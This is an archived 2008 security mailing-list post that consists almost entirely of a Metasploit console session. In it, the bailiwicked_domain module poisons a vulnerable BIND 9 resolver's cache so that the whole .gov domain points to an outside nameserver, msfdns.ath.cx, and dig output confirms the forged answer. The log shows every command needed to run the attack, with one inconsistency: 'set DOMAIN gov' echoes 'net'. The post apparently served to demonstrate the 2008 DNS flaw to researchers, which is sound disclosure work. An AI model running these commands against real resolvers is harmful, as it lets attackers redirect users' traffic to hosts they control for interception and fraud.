Dailydave mailing list archives

Re: DNS and other fun.

From: H D Moore <dailydave () digitaloffense net>
Date: Tue, 29 Jul 2008 16:59:00 -0500
Below is an example of poisoning ".gov" on a vulnerable BIND 9 instance.

This took about two minutes, no crazy fast packet generation required.

msf > use auxiliary/spoof/dns/bailiwicked_domain
msf auxiliary(bailiwicked_domain) > set RHOST A.B.C.D
RHOST => A.B.C.D
msf auxiliary(bailiwicked_domain) > set DOMAIN gov
DOMAIN => net
msf auxiliary(bailiwicked_domain) > set SRCPORT 0
SRCPORT => 0
msf auxiliary(bailiwicked_domain) > set NEWDNS msfdns.ath.cx
NEWDNS => msfdns.ath.cx
msf auxiliary(bailiwicked_domain) > run
[*] Switching to target port 48178 based on Metasploit service
[*] Warning: target address A.B.C.D is not the same as the nameserver's query source address 72.48.121.197!
[*] Targeting nameserver A.B.C.D for injection of gov. nameservers as msfdns.ath.cx
[*] Querying recon nameserver for gov.'s nameservers...
[*]  Got an NS record: gov.                    172717  IN      NS      F.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of F.GOV.ZONEEDIT.COM....
[*]    Got an A record: F.GOV.ZONEEDIT.COM.     172717  IN      A       66.197.185.229
[*]     Checking Authoritativeness: Querying 66.197.185.229 for gov....
[*]     F.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*]  Got an NS record: gov.                    172717  IN      NS      G.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of G.GOV.ZONEEDIT.COM....
[*]    Got an A record: G.GOV.ZONEEDIT.COM.     172717  IN      A       66.135.32.100
[*]     Checking Authoritativeness: Querying 66.135.32.100 for gov....
[*]     G.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*]  Got an NS record: gov.                    172717  IN      NS      C.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of C.GOV.ZONEEDIT.COM....
[*]    Got an A record: C.GOV.ZONEEDIT.COM.     172716  IN      A       69.72.142.35
[*]     Checking Authoritativeness: Querying 69.72.142.35 for gov....
[*]     C.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*]  Got an NS record: gov.                    172717  IN      NS      E.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of E.GOV.ZONEEDIT.COM....
[*]    Got an A record: E.GOV.ZONEEDIT.COM.     172716  IN      A       82.165.40.134
[*]     Checking Authoritativeness: Querying 82.165.40.134 for gov....
[*]     E.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*]  Got an NS record: gov.                    172717  IN      NS      D.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of D.GOV.ZONEEDIT.COM....
[*]    Got an A record: D.GOV.ZONEEDIT.COM.     172716  IN      A       209.97.207.48
[*]     Checking Authoritativeness: Querying 209.97.207.48 for gov....
[*]     D.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*]  Got an NS record: gov.                    172717  IN      NS      A.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of A.GOV.ZONEEDIT.COM....
[*]    Got an A record: A.GOV.ZONEEDIT.COM.     172716  IN      A       216.55.155.29
[*]     Checking Authoritativeness: Querying 216.55.155.29 for gov....
[*]     A.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*]  Got an NS record: gov.                    172717  IN      NS      B.GOV.ZONEEDIT.COM.
[*]   Querying recon nameserver for address of B.GOV.ZONEEDIT.COM....
[*]    Got an A record: B.GOV.ZONEEDIT.COM.     172715  IN      A       206.51.224.229
[*]     Checking Authoritativeness: Querying 206.51.224.229 for gov....
[*]     B.GOV.ZONEEDIT.COM. is authoritative for gov., adding to list of nameservers to spoof as
[*] Calculating the number of spoofed replies to send per query...
[*]   race calc: 100 queries | min/max/avg time: 0.01/0.19/0.04 | min/max/avg replies: 2/118/24
[*] Sending 5 spoofed replies from each nameserver (7) for each query
[*] Attempting to inject poison records for gov.'s nameservers into A.B.C.D:48178...
[*] Sent 1000 queries and 35000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*]   race calc: 25 queries | min/max/avg time: 0.01/0.11/0.03 | min/max/avg replies: 8/54/22
[*] Now sending 4 spoofed replies from each nameserver (7) for each query
[*] Sent 2000 queries and 63000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*]   race calc: 25 queries | min/max/avg time: 0.01/0.1/0.02 | min/max/avg replies: 3/35/16
[*] Now sending 3 spoofed replies from each nameserver (7) for each query
[*] Sent 3000 queries and 84000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*]   race calc: 25 queries | min/max/avg time: 0.01/0.14/0.03 | min/max/avg replies: 3/72/21
[*] Now sending 4 spoofed replies from each nameserver (7) for each query
[*] Sent 4000 queries and 112000 spoofed responses...
[*] Recalculating the number of spoofed replies to send per query...
[*]   race calc: 25 queries | min/max/avg time: 0.02/0.08/0.03 | min/max/avg replies: 8/40/28
[*] Now sending 6 spoofed replies from each nameserver (7) for each query
[*] Poisoning successful after 4000 queries and 112000 responses: gov. == msfdns.ath.cx
[*] Auxiliary module execution completed
msf auxiliary(bailiwicked_domain) > dig -t a poisoning_tlds_is_fun_and_fast.gov @A.B.C.D
[*] exec: dig -t a poisoning_tlds_is_fun_and_fast.gov @A.B.C.D


; <<>> DiG 9.3.2 <<>> -t a poisoning_tlds_is_fun_and_fast.gov @A.B.C.D
; (1 server found)
;; global options:  printcmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 5757
;; flags: qr rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1

;; QUESTION SECTION:
;poisoning_tlds_is_fun_and_fast.gov. IN A

;; ANSWER SECTION:
poisoning_tlds_is_fun_and_fast.gov. 60 IN A     1.3.3.7

;; AUTHORITY SECTION:
gov.                    41938   IN      NS      msfdns.ath.cx.

;; ADDITIONAL SECTION:
msfdns.ath.cx.          3       IN      A       71.41.138.124

;; Query time: 23 msec
;; SERVER: A.B.C.D#53(A.B.C.D)
;; WHEN: Tue Jul 29 16:55:08 2008
;; MSG SIZE  rcvd: 111

poisoning_tlds_is_fun_and_fast.gov = 1.3.3.7
_______________________________________________
Dailydave mailing list
Dailydave () lists immunitysec com
http://lists.immunitysec.com/mailman/listinfo/dailydave
Current thread:

DNS and other fun. Dave Aitel (Jul 29)
- Re: DNS and other fun. H D Moore (Jul 29)
- Message not available
  - Re: DNS and other fun. H D Moore (Jul 29)
- Re: DNS and other fun. marc_bevand (Jul 29)